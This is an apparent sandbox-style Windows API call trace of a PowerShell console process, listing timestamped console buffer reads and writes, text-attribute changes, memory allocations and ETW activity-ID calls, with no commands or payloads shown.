ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.519] CoTaskMemFree (pv=0x1a8ad510) [0351.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.520] GetConsoleOutputCP () returned 0x1b5 [0351.520] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.520] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.522] CoTaskMemFree (pv=0x1a8ad510) [0351.522] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.522] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.522] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.523] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.523] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.523] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.524] GetConsoleOutputCP () returned 0x1b5 [0351.524] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.524] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.525] CoTaskMemFree (pv=0x1a8ad510) [0351.525] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.526] GetConsoleOutputCP () returned 0x1b5 [0351.527] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.527] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.527] CoTaskMemFree (pv=0x1a8ad510) [0351.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.528] GetConsoleOutputCP () returned 0x1b5 [0351.529] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.529] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.529] CoTaskMemFree (pv=0x1a8ad510) [0351.532] EtwEventActivityIdControl () returned 0x0 [0351.532] EtwEventActivityIdControl () returned 0x0 [0351.532] EtwEventActivityIdControl () returned 0x0 [0351.532] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x5d8 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] EtwEventActivityIdControl () returned 0x0 [0351.533] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62b630, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] EtwEventActivityIdControl () returned 0x0 [0351.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62cfd8 | out: lpConsoleScreenBufferInfo=0x1b62cfd8) returned 1 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.535] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c3b0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.537] EtwEventActivityIdControl () returned 0x0 [0351.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62db98 | out: lpConsoleScreenBufferInfo=0x1b62db98) returned 1 [0351.539] GetConsoleOutputCP () returned 0x1b5 [0351.539] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.539] GetConsoleOutputCP () returned 0x1b5 [0351.539] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.539] GetConsoleOutputCP () returned 0x1b5 [0351.540] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.540] GetConsoleOutputCP () returned 0x1b5 [0351.540] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.540] GetConsoleOutputCP () returned 0x1b5 [0351.540] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.541] GetConsoleOutputCP () returned 0x1b5 [0351.541] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.541] GetConsoleOutputCP () returned 0x1b5 [0351.541] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.541] GetConsoleOutputCP () returned 0x1b5 [0351.542] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.542] GetConsoleOutputCP () returned 0x1b5 [0351.542] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.542] GetConsoleOutputCP () returned 0x1b5 [0351.542] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.543] GetConsoleOutputCP () returned 0x1b5 [0351.543] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.543] GetConsoleOutputCP () returned 0x1b5 [0351.543] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.543] GetConsoleOutputCP () returned 0x1b5 [0351.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.544] GetConsoleOutputCP () returned 0x1b5 [0351.544] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.544] GetConsoleOutputCP () returned 0x1b5 [0351.545] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.545] GetConsoleOutputCP () returned 0x1b5 [0351.545] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.545] GetConsoleOutputCP () returned 0x1b5 [0351.545] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.545] GetConsoleOutputCP () returned 0x1b5 [0351.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.546] GetConsoleOutputCP () returned 0x1b5 [0351.546] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.546] GetConsoleOutputCP () returned 0x1b5 [0351.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.547] GetConsoleOutputCP () returned 0x1b5 [0351.547] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.547] GetConsoleOutputCP () returned 0x1b5 [0351.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.548] GetConsoleOutputCP () returned 0x1b5 [0351.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.548] GetConsoleOutputCP () returned 0x1b5 [0351.548] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.549] GetConsoleOutputCP () returned 0x1b5 [0351.549] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.549] GetConsoleOutputCP () returned 0x1b5 [0351.549] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.549] GetConsoleOutputCP () returned 0x1b5 [0351.550] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.550] GetConsoleOutputCP () returned 0x1b5 [0351.550] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.550] GetConsoleOutputCP () returned 0x1b5 [0351.550] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.551] GetConsoleOutputCP () returned 0x1b5 [0351.551] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.551] GetConsoleOutputCP () returned 0x1b5 [0351.551] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x1b62d9e8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x1b62d9e8) returned 0 [0351.551] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.552] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.553] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.553] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.553] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.554] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.554] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.555] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.555] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.555] GetConsoleOutputCP () returned 0x1b5 [0351.556] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.556] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.557] CoTaskMemFree (pv=0x1a8ad510) [0351.557] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x288d3dc*, nNumberOfCharsToWrite=0x45, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x288d3dc*, lpNumberOfCharsWritten=0x1b62da58*=0x45) returned 1 [0351.557] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.558] GetConsoleOutputCP () returned 0x1b5 [0351.558] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.559] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.559] CoTaskMemFree (pv=0x1a8ad510) [0351.559] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.560] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.560] GetConsoleOutputCP () returned 0x1b5 [0351.560] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.560] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.562] CoTaskMemFree (pv=0x1a8ad510) [0351.562] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.563] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.563] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.563] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.564] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.564] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.564] GetConsoleOutputCP () returned 0x1b5 [0351.565] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.565] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.566] CoTaskMemFree (pv=0x1a8ad510) [0351.566] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.566] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.566] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.567] GetConsoleOutputCP () returned 0x1b5 [0351.568] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.568] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.569] CoTaskMemFree (pv=0x1a8ad510) [0351.569] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.569] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.569] GetConsoleOutputCP () returned 0x1b5 [0351.574] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.574] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.575] CoTaskMemFree (pv=0x1a8ad510) [0351.575] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0351.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0351.576] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.577] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 [0351.577] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0351.578] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0xc) returned 1 [0351.578] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62da70 | out: lpMode=0x1b62da70) returned 1 [0351.578] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9c8 | out: lpConsoleScreenBufferInfo=0x1b62d9c8) returned 1 [0351.579] GetConsoleOutputCP () returned 0x1b5 [0351.579] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.579] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d850 | out: lpWriteRegion=0x1b62d850) returned 1 [0351.580] CoTaskMemFree (pv=0x1a8ad510) [0351.580] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x26bff3c*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x1b62da58, lpReserved=0x0 | out: lpBuffer=0x26bff3c*, lpNumberOfCharsWritten=0x1b62da58*=0x10) returned 1 [0351.581] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.582] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d918 | out: lpConsoleScreenBufferInfo=0x1b62d918) returned 1 [0351.582] GetConsoleOutputCP () returned 0x1b5 [0351.585] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.585] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d810 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d810) returned 1 [0351.590] CoTaskMemFree (pv=0x1a8ad510) [0351.590] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d738 | out: lpConsoleScreenBufferInfo=0x1b62d738) returned 1 [0351.591] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d978 | out: lpConsoleScreenBufferInfo=0x1b62d978) returned 1 [0351.593] GetConsoleOutputCP () returned 0x1b5 [0351.594] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.594] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d800 | out: lpWriteRegion=0x1b62d800) returned 1 [0351.597] CoTaskMemFree (pv=0x1a8ad510) [0351.597] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.599] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x6) returned 1 [0351.613] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9f8 | out: lpConsoleScreenBufferInfo=0x1b62d9f8) returned 1 [0351.618] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x56) returned 1 [0351.621] GetConsoleMode (in: hConsoleHandle=0x5e4, lpMode=0x1b62db10 | out: lpMode=0x1b62db10) returned 1 [0351.626] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da68 | out: lpConsoleScreenBufferInfo=0x1b62da68) returned 1 [0351.628] GetConsoleOutputCP () returned 0x1b5 [0351.629] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.630] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8f0 | out: lpWriteRegion=0x1b62d8f0) returned 1 [0351.635] CoTaskMemFree (pv=0x1a8ad510) [0351.635] WriteConsoleW (in: hConsoleOutput=0x5e4, lpBuffer=0x206fd44*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1b62daf8, lpReserved=0x0 | out: lpBuffer=0x206fd44*, lpNumberOfCharsWritten=0x1b62daf8*=0x1) returned 1 [0351.638] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.642] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d9b8 | out: lpConsoleScreenBufferInfo=0x1b62d9b8) returned 1 [0351.644] GetConsoleOutputCP () returned 0x1b5 [0351.646] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.647] ReadConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpReadRegion=0x1b62d8b0 | out: lpBuffer=0x1a8ad510, lpReadRegion=0x1b62d8b0) returned 1 [0351.649] CoTaskMemFree (pv=0x1a8ad510) [0351.649] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62d7d8 | out: lpConsoleScreenBufferInfo=0x1b62d7d8) returned 1 [0351.651] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da18 | out: lpConsoleScreenBufferInfo=0x1b62da18) returned 1 [0351.653] GetConsoleOutputCP () returned 0x1b5 [0351.870] CoTaskMemAlloc (cb=0x960) returned 0x1a8ad510 [0351.870] WriteConsoleOutputW (in: hConsoleOutput=0x5e4, lpBuffer=0x1a8ad510, dwBufferSize=0x50078, dwBufferCoord=0x0, lpWriteRegion=0x1b62d8a0 | out: lpWriteRegion=0x1b62d8a0) returned 1 [0351.980] CoTaskMemFree (pv=0x1a8ad510) [0351.980] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62dad8 | out: lpConsoleScreenBufferInfo=0x1b62dad8) returned 1 [0352.021] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.024] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da38 | out: lpConsoleScreenBufferInfo=0x1b62da38) returned 1 [0352.025] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x5e4, lpConsoleScreenBufferInfo=0x1b62da48 | out: lpConsoleScreenBufferInfo=0x1b62da48) returned 1 [0352.027] SetConsoleTextAttribute (hConsoleOutput=0x5e4, wAttributes=0x5c) returned 1 